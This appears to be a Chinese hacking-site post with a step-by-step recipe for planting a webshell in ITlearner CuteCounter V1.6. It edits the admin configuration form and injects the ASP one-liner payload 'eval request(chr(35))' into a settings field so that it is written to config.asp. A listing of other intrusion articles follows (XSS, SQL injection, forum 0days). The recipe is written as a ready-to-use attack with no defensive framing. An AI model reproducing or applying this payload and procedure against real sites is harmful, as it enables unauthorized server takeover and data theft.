[推荐]ITlearner CuteCounter V1.6后台获得webshell进入http://url/admin.asp?action=ShowConfig,查看原代码
查找<td><input name=\"RecordNum\" type=\"text\" id=\"RecordNum\" value=\"100\" size=\"40\" maxlength=\"3\"></td>
修改maxlength=\"3\"为maxlength=\"50\">
然后查找 <form name=\"form1\" method=\"post\" action=\"?Action=SaveConfig\">处
修改为action=\"http://url/admin?Action=SaveConfig\">
存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35))
此处没有哪个\"的然后保存设置后提示成功后
用海洋eval连接http://url/config.asp文件就获得一个webshell!
| dxbbs漏洞(通杀7.3以前所有版本) | 04-06 | |
| 记对一足球推荐站点的渗透 | 04-06 | |
| 注射DB_ONER权限并且主机与数据库 | 04-06 | |
| bbsxp sql最新版再爆0day? | 04-02 | |
| BBS的通杀跨站方法 | 04-02 | |
| CCTV的XSS跨站 | 03-28 | |
| 全面解析百度XSS跨站漏洞 | 03-26 | |
| Wordpress 2.1.2 以及之前版本物 | 03-26 | |
| 动易最新入侵方法 | 03-15 | |
| PJBlog漏洞利用 | 03-14 | |
| DVBBS <= 7.1.0 sp1 博客 远程注 | 03-14 | |
| php简单入侵 | 02-07 | |
您现在的位置: